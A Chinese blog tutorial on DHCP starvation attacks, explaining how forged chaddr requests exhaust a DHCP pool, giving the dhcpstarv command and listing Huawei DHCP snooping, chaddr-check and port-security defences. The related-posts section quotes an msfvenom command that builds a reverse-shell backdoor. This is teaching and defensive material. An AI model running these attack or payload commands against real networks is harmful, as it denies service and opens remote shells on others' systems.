DHCP饿死攻击

已于 2022-05-08 10:43:38 修改
阅读量4.6k 收藏 33
点赞数 4
分类专栏: 网络安全 文章标签: 网络安全
于 2022-04-10 11:46:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/purvispanwu/article/details/124070092
版权

原理

如果需要进行DHCP饿死攻击,必须不断发送伪造不同的chaddr地址的dhcp discover消息来获取地址
在这里插入图片描述

漏洞分析

DHCP服务器向申请者分配IP地址时,无法区分正常的申请者与恶意的申请者
在这里插入图片描述

实现工具

在这里插入图片描述

  • kaili: Dhcpstarv工具
  • 攻击命令
    • dhcpstarv -i [interface-name]
    • 例子:dhcpstarv -i eth0
      在这里插入图片描述

在这里插入图片描述

防御方式

  • dhcp snooping
    开启dhcp snooping监听dhcp recover报文
[Huawei]dhcp enable 
[Huawei]dhcp snooping enable 
[Huawei]int vlan10
[Huawei-Vlanif10]dhcp snooping enable
  • check-chadder
    检查二层封装的源mac地址与dhcp报文中的chaddr是否相同,如果不相同认为是伪造的消息,会丢弃消息
[Huawei]port-group 1
[Huawei-port-group-1]
[Huawei-port-group-1]group-member Ethernet 0/0/1 to Ethernet 0/0/20
[Huawei-port-group-1]dhcp snooping check dhcp-chaddr enable

在这里插入图片描述

补充

源mac地址变化的dhcp饿死攻击(下图这种,会让交换机端口学习到大量的mac地址),无法通过check-chaddr实现,需要通过端口安全方式实现。
防御:在一个交换机的一个access口下,只允许一个mac学习。如果学习到多个,那么则对端口进行惩罚,惩罚方式-关闭接口

[Huawei]port-group 1
[Huawei-port-group-1]port-security enable 
[Huawei-port-group-1]port-security max-mac-num 1
[Huawei-port-group-1]port-security protect-action shutdown

在这里插入图片描述

Purvis_U
关注
  • 4
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
dhcpstarv-开源
05-02
DHCP饥饿实用程序。 如果恶意DHCP服务器出现在您的网络中,请使用dhcpstarv。
常见的DHCP攻击防范
栉风沐雪的博客
06-06 1293
DHCP用来自动分配ip地址,每一个DHCP service(DHCP服务器)都有一个DHCP pool(分配池),每一个终端对DHCP service发送请求时,DHCP service会从池中给终端分配IP,分配的方式会因为OS不同而不同,从前往后,从后往前,或者随机分配。DHCP饿死攻击是利用修改discover报文中的CHADDR地址,不断的向DHCP service发送请求,以此来耗尽DHCP pool中的地址。当其他终端在此想使用DHCP服务时,收到的ip为空。
DHCP协议原理分析与饥饿攻击的实现
Higher-Jing的博客
06-24 1309
DHCP(动态主机配置协议)是一个局域网的网络协议。指的是由服务器控制一段IP地址范围,客户机登录服务器时就可以自动获得服务器分配的IP地址和子网掩码。
dhcp饿死攻击,端口安全原理,子网划分
xigua2540的博客
04-26 113
display mac-address security //查看安全动态地址表。display mac-address sticky //查看粘性MAC地址表。安全MAC地址分类:安全动态MAC Sticky(粘性)MAC与静态MAC。display mac-address //查看动态mac地址表。子网划分的作用:节约ip地址,减少ip地址的浪费。子网划分:将一个网络划分成多个更小的网络。CHADDR 指的是 客户端的硬件地址。子网划分:让网络位变长,主机位变短。等长子网划分:每个子网长度相同。
DHCP Snooping、DHCP Server仿冒者攻击DHCP饿死攻击
weixin_55932038的博客
07-10 1795
因为DHCP客户端发送的DHCP Discover报文是以广播形式发送,无论是合法的DHCP 服务器,还是非法的DHCP Server都可以接收到DHCP Discover报文,如果此时非法的DHCP仿冒服务器,回应给DHCP 客户端,恶意的仿冒信息(如:错误的IP、错误的网关、错误的DNS),DHCP 客户端无法分辨这些信息,所以最终导致DHCP客户端无法上网和信息泄露。[SW3-DHCP-Vlanif1]dhcp select global //在vlanif 1虚接口下开启基于全局的dhcp
局域网攻击DHCP Starvation(DHCP饿死
YYYYU_ZHIZZZ的博客
05-29 3324
DHCP泛洪攻击
DHCP饿死攻击及防御(基于ENSP模拟器、Kali攻击机实现)
最新发布
tigerman20201的博客
01-29 1302
1.DHCP饿死攻击及防御(基于ENSP模拟器、Kali攻击机实现)
基于python的耗尽DHCP地址池攻击脚本分析
lijihao_10086的博客
01-13 2102
简介: 之前在博客上有浏览到其他大神写的耗尽DHCP地址池的攻击脚本,但是没有具体的解析,这里将简单介绍整个脚本的思路,和具体代码分析。 本人代码能力有限,有不足和错误之处,还希望多多指点,欢迎交流 话不多说,上代码啦啦啦啦啦啦啦() 脚本思路: 1.线程1----sniff_dhcp: 过滤抓取DHCP Offer报文,分析Offer报文字段,提取DHCP服务器回应的Offer信息。并根据提取的...
常见的攻击防护
qq_62449917的博客
12-02 1288
只做模拟机器使用,不使用真实机器目录一、 DHCP饿死和防护应对措施.................................. 11, 实验拓扑:...................................................... 22, 实验配置.......................................................... 22.1删改设备名字............................................ 2
DHCP攻击及防御
热门推荐
qq_43518594的博客
10-15 1万+
DHCP攻击 原理: DHCP攻击针对的目标是网络中的DHCP服务器,原理是耗尽DHCP服务器所有的IP地址资源,使其无法正常提供地址分配服务。然后在网络中再架设假冒的DHCP服务器为客户端分发IP地址,从而来实现中间人攻击DHCP工作过程: 工作过程分为四个阶段 发现阶段:首先客户端广播发送DHCP Discover报文来寻找DHCP服务器。 提供阶段:DHCP服务器接收到DHCP Discover报文后,查看自己的地址池中是否有可用地址,如果有,会在这个IP上做一个标记,并用DHCP Offer报
DHCP-Powner:DHCP 饥饿漏洞利用
06-24
DHCP-Powner DHCP 饥饿漏洞利用
dhcp地址池攻击
12-30
使用bt5的yersinia攻击windows server 2003搭建的dhcp服务器
DHCP snooping代码
08-05
在使用DHCP动态获取地址上网的环境中如何防止DOS服务攻击DHCP snooping对DHCP 整个过程进行监控,防止恶意获取地址。
isc dhcp 4.3.1 源代码
07-23
文件名: dhcp-4.4.3-P1.tar.gz Linux 著名的dhcp server 源代码
DHCP实验.docx
06-14
[Huawei]dhcp enable //开启DHCP服务 [Huawei-ip-pool-a]network 192.168.1.0 mask 24 //给DHCP范围 [Huawei-ip-pool-a]gateway-list 192.168.1.1 //配置网关 [Huawei-ip-pool-a]dns-list 192.168.2.200 //配置DNS...
Sql注入-POST注入
purvispanwu的博客
12-19 2867
sql注入,网络安全
[内网渗透]msfconsole提权
purvispanwu的博客
03-17 1263
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
Windows默认共享IPC$攻击实践
purvispanwu的博客
05-02 1219
简介 IPC共享命名的管道资源,为了让进程之间通信而开放的命名管道,可以通过验证用户名和密码获得相应的去权限,远程管理计算机和检查计算机的共享资源时使用的. 如果远程服务器没有监听139或445端口,IPC$会话是无法建立的。 实验工具 nmap-探测机器服务和端口 kali-Hydra 暴力破解获取目标机器的账号密码 靶机 ip:192.168.1.2 版本:Windows server 2016 攻击机 ip:192.168.1.3 版本:Windows 7 攻击步骤 1. 利用nma
dhcp饿死攻击原理
10-28
DHCP饿死攻击是一种利用DHCP协议的漏洞,通过修改DHCP Discover报文中的CHADDR地址,不断向DHCP服务器发送请求,以此来耗尽DHCP地址池中的IP地址的攻击方式。攻击者可以通过这种方式使得网络中的其他设备无法获取到可用的IP地址,从而导致网络瘫痪。为了防范这种攻击,可以开启DHCP Snooping和DHCP Snooping Check CHADDR功能,通过比较MAC地址和CHADDR地址是否一致来防止这种攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值